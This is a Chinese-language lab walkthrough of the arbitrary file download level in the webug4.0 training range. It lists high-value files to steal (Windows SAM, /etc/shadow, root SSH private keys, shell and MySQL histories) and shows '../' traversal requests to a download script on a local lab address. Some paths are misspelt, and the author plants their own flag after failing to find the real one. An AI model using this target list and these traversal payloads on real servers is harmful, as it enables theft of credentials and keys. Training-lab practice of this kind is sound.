webug4.0-任意文件下载

0x01 漏洞利用

1.首先打开页面:

webug4.0-任意文件下载_第1张图片

分别下载下来 内容分别是  life is sort, your need me.  和 HELLO WORLD 好吧没发现flag

2.审查元素:

webug4.0-任意文件下载_第2张图片

3. windows和linux系统的关键文件:

Windows:

C:\boot.ini //查看系统版本

C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件

C:\Windows\repair\sam //存储系统初次安装的密码

C:\Program Files\mysql\my.ini //Mysql配置

C:\Program Files\mysql\data\mysql\user.MYD //Mysql root

C:\Windows\php.ini //php配置信息

C:\Windows\my.ini //Mysql配置信息

C:\Windows\win.ini //Windows系统的一个基本系统配置文件

Linux:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_ras.keystore

/root/.ssh/known_hosts //记录每个访问计算机用户的公钥

/etc/passwd

/etc/shadow

/etc/my.cnf //mysql配置文件

/etc/httpd/conf/httpd.conf //apache配置文件

/root/.bash_history //用户历史命令记录文件

/root/.mysql_history //mysql历史命令记录文件

/proc/mounts //记录系统挂载设备

/porc/config.gz //内核配置文件

/var/lib/mlocate/mlocate.db //全文件路径

/porc/self/cmdline //当前进程的cmdline参数

参考链接:

https://www.cnblogs.com/zhaijiahui/p/8459661.html

4.手工试文件目录:

192.168.72.136/control/filedownload/file_download.php?file=boot.ini 页面没有反应
192.168.72.136/control/filedownload/file_download.php?file=../boot.ini 页面没有反应
192.168.72.136/control/filedownload/file_download.php?file=../../boot.ini 页面提示下载

 5.在服务器根目录搜索txt文件:

webug4.0-任意文件下载_第3张图片

基本上都打开看了一遍没有找到flag

6.自建flag:在1.txt所在目录新建文件3.txt(毕竟这个我们可能会猜到)  同时内容为 sadfvgsadfhe

7.打开链接

192.168.72.136/control/filedownload/file_download.php?file=template/assets/img/3.txt

8.打开之后找到flag: sadfvgsadfhe

0x02 结语

                                                                                               不想说话

你可能感兴趣的:(WEBUG4.0通关)